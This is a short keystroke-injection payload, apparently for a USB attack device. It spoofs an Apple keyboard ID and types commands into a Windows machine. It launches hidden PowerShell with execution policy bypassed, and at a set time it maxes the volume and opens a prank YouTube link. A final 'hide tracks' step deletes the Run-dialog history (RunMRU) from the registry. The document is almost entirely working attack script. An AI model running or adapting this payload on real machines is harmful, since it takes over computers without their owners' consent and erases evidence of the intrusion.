ATTACKMODE HID VID_0X05AC PID_0X021E #Use format described in the readme time=1051 #run payload LED R 200 Q GUI r Q DELAY 200 Q STRING cmd -A '/t:fe /k mode con: lines=1 cols=15' Q DELAY 200 Q ENTER Q DELAY 500 Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass \$hi=0\; \$ho=\(Get-Date\).Hour.toString\(\)\; while \(\$hi -eq \'0\'\) \{ if \(\$ho -eq $time \) \{\$vol=new-object -com wscript.shell\; For\(\$i=0\; \$i -le 50\; \$i\+\+\)\{\$vol.SendKeys\(\[char\]175\)\}\; start \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; \$hi=1\; \} \$ho=\(Get-Date\).Hour.toString\(\)\+\(Get-Date\).Minute.toString\(\)\;\} Q DELAY 500 Q ENTER #Hide tracks LED B 500 QUACK GUI r QUACK DELAY 1000 QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" QUACK ENTER LED G